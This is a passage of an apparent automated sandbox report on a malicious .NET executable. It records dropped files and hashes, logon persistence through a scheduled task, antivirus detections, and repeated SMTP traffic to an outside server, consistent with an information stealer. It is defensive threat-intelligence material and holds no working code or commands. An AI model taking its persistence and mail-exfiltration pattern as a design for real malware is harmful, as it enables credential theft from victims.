                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
| Time | Type | Description |
| --- | --- | --- |
| 03:23:23 | API Interceptor | 7083842x Sleep call for process: kAsh3nmsgs.exe modified |
| 03:23:25 | API Interceptor | 34x Sleep call for process: powershell.exe modified |
| 03:23:28 | API Interceptor | 5493875x Sleep call for process: HHhSyZN.exe modified |
| 08:23:25 | Task Scheduler | Run new task: HHhSyZN path: C:\Users\user\AppData\Roaming\HHhSyZN.exe |
                                                                                                              gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.64.1
                                                                                                              ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.48.1
                                                                                                              Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                                                              • 104.16.185.241
                                                                                                              dhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 104.26.13.205
                                                                                                              No context
                                                                                                              Process:C:\Users\user\AppData\Roaming\HHhSyZN.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1216
                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                              Malicious:false
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                              Process:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1216
                                                                                                              Entropy (8bit):5.34331486778365
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                              Malicious:true
                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2232
                                                                                                              Entropy (8bit):5.380134126512796
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:+WSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//Z+Uyus:+LHxvIIwLgZ2KRHWLOugIs
                                                                                                              MD5:83D814868CBF9068DD1444C317198A9C
                                                                                                              SHA1:6049307C35C1B0D2F83FA2AFC9CE1C4FDD7B3097
                                                                                                              SHA-256:82FC1E483B2623D07B9D4D11765CA6DE67AEB3736ADA12AEF538CC7308ECBE57
                                                                                                              SHA-512:C281867927B40CD12B10984C8678956B33278EF8C704F993597D1462A41E92D6582404294EE1B20DD4A99BF704E2854544A37447081AD9B7CC90C3ED33A82E74
                                                                                                              Malicious:false
                                                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1573
                                                                                                              Entropy (8bit):5.113430814479235
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtanxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTqv
                                                                                                              MD5:7DF3A518234304E3DF5524A16E4C10EF
                                                                                                              SHA1:909109903CA581393A8713E2428AAE740EB30151
                                                                                                              SHA-256:26A2FDBCDB73D11C525187C3020899F221E0C5A5B5FFF9744C91F45FF9AC6F35
                                                                                                              SHA-512:264C8F35D422C482317A85E2DF42BCBD19A021F240D9DBEB73621B85CFBA1FDE6419EFEE21CB43C8AB58F62C7378ED5624D7FC15FD44FD00F265940F4B78BC3D
                                                                                                              Malicious:true
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                              Process:C:\Users\user\AppData\Roaming\HHhSyZN.exe
                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1573
                                                                                                              Entropy (8bit):5.113430814479235
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtanxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTqv
                                                                                                              MD5:7DF3A518234304E3DF5524A16E4C10EF
                                                                                                              SHA1:909109903CA581393A8713E2428AAE740EB30151
                                                                                                              SHA-256:26A2FDBCDB73D11C525187C3020899F221E0C5A5B5FFF9744C91F45FF9AC6F35
                                                                                                              SHA-512:264C8F35D422C482317A85E2DF42BCBD19A021F240D9DBEB73621B85CFBA1FDE6419EFEE21CB43C8AB58F62C7378ED5624D7FC15FD44FD00F265940F4B78BC3D
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                              Process:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):835072
                                                                                                              Entropy (8bit):7.73957486937244
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:ISu336AhZYD+Oxv2lVzxNpnFuR1zGUxj:Il3q2GD+Pt/gL
                                                                                                              MD5:71DBD91C836C0B016174CA9E0A2B848A
                                                                                                              SHA1:4417EBCD2635EB4F5D66707A2E2BB5440D058C5C
                                                                                                              SHA-256:DF3A573B20EBE9B8A1D4769EC25F439B2738EA14008D9BBF469234033845E6CA
                                                                                                              SHA-512:1C583039970AFCD51FD6CFA42A17BC76CAB9B410177E01A054767249AC9BC5EB341D3B109CF6A26A34D9D753F9D339CBC95D49A8AC9F52F35B361D28682F9DE0
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 79%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@.....................................S........*........................................................................... ............... ..H............text........ ...................... ..`.rsrc....*.......,..................@..@.reloc..............................@..B.......................H.......................(....0............................................W.'ISYB.R.fU[..C.G...;.....k.H.....Uqz-.w..I.s.R.+..Dy.L.9.Q.s......}G.....Fst.Fy..../....b..!5..M...1.^<...K......H.|.a\.]....<3....o.T.......8G..~....W@....0..Q......2`:..(..H....].^.8...A....s$Q.B5.......QNf..",.0....>L.].....J.B..&x...+.........c.32..}!....G.. n.WZ.%.}.V...MW..<P..8q.F.....9.X..eh.,6....B.....F8.....2.#:.Z...z:l.A[.hu.|.R...p...JN-.,...p}.i..,.i.0....e.....A2.....Q..
                                                                                                              Process:C:\Users\user\Desktop\kAsh3nmsgs.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26
                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                              Malicious:true
                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):7.73957486937244
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              File name:kAsh3nmsgs.exe
                                                                                                              File size:835'072 bytes
                                                                                                              MD5:71dbd91c836c0b016174ca9e0a2b848a
                                                                                                              SHA1:4417ebcd2635eb4f5d66707a2e2bb5440d058c5c
                                                                                                              SHA256:df3a573b20ebe9b8a1d4769ec25f439b2738ea14008d9bbf469234033845e6ca
                                                                                                              SHA512:1c583039970afcd51fd6cfa42a17bc76cab9b410177e01a054767249ac9bc5eb341d3b109cf6a26a34d9d753f9d339cbc95d49a8ac9f52f35b361d28682f9de0
                                                                                                              SSDEEP:24576:ISu336AhZYD+Oxv2lVzxNpnFuR1zGUxj:Il3q2GD+Pt/gL
                                                                                                              TLSH:8E05D0983611B09FC8A7C9318964DDB4A6206CBB9B0BC30395D72DEFBA1D597DE041F2
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................
                                                                                                              Icon Hash:323636b29699c72c
                                                                                                              Entrypoint:0x4cabfe
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0xCC1F1A8D [Sat Jul 9 11:07:57 2078 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xcaba8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcc000 | 0x2a08 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc8c04 | 0xc8e00 | f6b6d3e737ff7de753d8d0c6926c2c87 | False | 0.8864452881922837 | data | 7.744400724877213 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xcc000 | 0x2a08 | 0x2c00 | eda927ab2af364d1f9a1109e582ebd1c | False | 0.8746448863636364 | data | 7.486239477388125 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd0000 | 0xc | 0x200 | 0da7e65977f7ad5135fc1e15bb5ff56a | False | 0.041015625 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xcc130 | 0x244f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9797740720817644
RT_GROUP_ICON | 0xce580 | 0x14 | data | | | 1.05
RT_VERSION | 0xce594 | 0x288 | data | | | 0.46141975308641975
RT_MANIFEST | 0xce81c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                              Jan 11, 2025 09:25:00.624694109 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.841236115 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.849890947 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.849965096 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.850019932 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.850110054 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.852087021 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.854823112 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.854835033 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.854846954 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.854875088 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.854948997 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.854990005 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.856926918 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.856947899 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.856987953 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857004881 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857013941 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857037067 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857047081 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857062101 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857070923 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857080936 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857093096 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857103109 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857125044 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.857140064 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857157946 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.857233047 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.859664917 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.859721899 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.859771013 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.859817028 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.861740112 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.861787081 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.861812115 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.861856937 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.861938000 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.861974955 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.861988068 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.862018108 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.862039089 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.862049103 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.862063885 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.862097025 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.862118006 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.862129927 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.862184048 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.862186909 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.862241983 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:00.864542961 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.864634991 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866585016 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866710901 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866720915 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866803885 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866874933 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.866965055 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867063046 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867083073 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867217064 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867273092 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867281914 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867362976 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867372036 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867424965 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867434025 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867466927 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867475986 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867506027 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867515087 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867583990 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867594004 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:00.867604971 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:01.811378956 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:01.851641893 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:04.742290020 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:04.747308016 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:04.963879108 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:04.964027882 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:04.964080095 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:04.964437962 CET49979587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:04.966104984 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:04.969192982 CET5874997977.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:04.970962048 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:04.971029997 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:05.596077919 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:05.596230030 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:05.601068020 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:05.820884943 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:05.821156025 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:05.826026917 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:05.945843935 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:05.950910091 CET5875001477.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:05.951004982 CET50014587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:06.028007030 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:06.032938957 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:06.033070087 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:06.657536983 CET5875001577.88.21.158192.168.2.4
                                                                                                              Jan 11, 2025 09:25:06.657810926 CET50015587192.168.2.477.88.21.158
                                                                                                              Jan 11, 2025 09:25:06.662676096 CET5875001577.88.21.158192.168.2.4
